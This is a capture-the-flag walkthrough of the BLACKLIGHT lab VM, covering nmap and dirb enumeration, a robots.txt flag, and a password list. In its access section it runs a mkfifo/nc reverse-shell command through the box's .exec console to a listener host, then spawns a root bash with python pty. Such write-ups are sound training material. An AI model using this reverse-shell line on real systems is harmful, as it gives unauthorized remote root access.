### Information gathering
#### Finding the target
```bash
$ nmap -sS 10.0.2.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 12:22 CST
$ nmap -A 10.0.2.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 12:24 CST
Nmap scan report for 10.0.2.7
Host is up (0.00023s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
MAC Address: 08:00:27:71:EE:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms 10.0.2.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds
$ nmap -p- 10.0.2.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 12:36 CST
Nmap scan report for 10.0.2.7
Host is up (0.000066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
9072/tcp open unknown
MAC Address: 08:00:27:71:EE:5F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
```
As shown above, ports 80 and 9072 are open.
#### Website information
```bash
$ dirb http://10.0.2.7/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Apr 16 12:25:56 2019
URL_BASE: http://10.0.2.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.7/ ----
==> DIRECTORY: http://10.0.2.7/css/
==> DIRECTORY: http://10.0.2.7/fonts/
==> DIRECTORY: http://10.0.2.7/footer/
==> DIRECTORY: http://10.0.2.7/img/
+ http://10.0.2.7/index.html (CODE:200|SIZE:1759)
==> DIRECTORY: http://10.0.2.7/javascript/
==> DIRECTORY: http://10.0.2.7/js/
+ http://10.0.2.7/robots.txt (CODE:200|SIZE:40)
+ http://10.0.2.7/server-status (CODE:403|SIZE:296)
---- Entering directory: http://10.0.2.7/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/footer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/javascript/ ----
==> DIRECTORY: http://10.0.2.7/javascript/jquery/
---- Entering directory: http://10.0.2.7/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/javascript/jquery/ ----
+ http://10.0.2.7/javascript/jquery/jquery (CODE:200|SIZE:268026)
-----------------
END_TIME: Tue Apr 16 12:26:01 2019
DOWNLOADED: 13836 - FOUND: 4
```
There is a robots.txt:
```code
User-agent: *
flag1.txt
blacklight.dict
```
flag1.txt:
```code
{flag1:fc4c7223964a26b152823d14f129687207e7fe15}
9072. The secret is at home.
```
This hints at port 9072.
blacklight.dict:
```code
000000
111111
11111111
112233
121212
123123
123456
1234567
12345678
123456789
131313
232323
654321
666666
696969
777777
7777777
8675309
987654
aaaaaa
abc123
abcdef
abgrtyu
access
access14
action
albert
alberto
alexis
alejandra
alejandro
amanda
.......
```
It looks like a list of usernames or something similar; set it aside for now.
### Gaining access
Connect to port 9072, found above, with nc.
```bash
$ nc 10.0.2.7 9072
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec <cmd> - Execute commands
.quit - Exit the server
.readhash
b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6
You have one more command until the server shuts down. Choose wisel
$ nc 10.0.2.7 9072
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec <cmd> - Execute commands
.quit - Exit the server
You have one more command until the server shuts down. Choose wisely!
```
It is hard to run any useful command here. There are two ideas at this point: get around the limit and bounce back a second nc shell.
```bash
nc -lvp 4443
.exec rm /tmp/icekam;mkfifo /tmp/icekam;cat /tmp/icekam|/bin/sh -i 2>&1|nc 10.0.2.5 4443 >/tmp/icekam
10.0.2.7: inverse host lookup failed: Unknown host
connect to [10.0.2.5] from (UNKNOWN) [10.0.2.7] 43776
/bin/sh: 0: can't access tty; job control turned off
```
The traditional read-based approach could not bounce a shell; the variant starting with rm succeeded.
Switch to a bash shell:
```bash
python -c "import pty;pty.spawn('/bin/bash')"
root@blacklight:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@blacklight:~#
```
### Summary
This environment is fairly basic; it is good practice for the second reverse nc connection technique.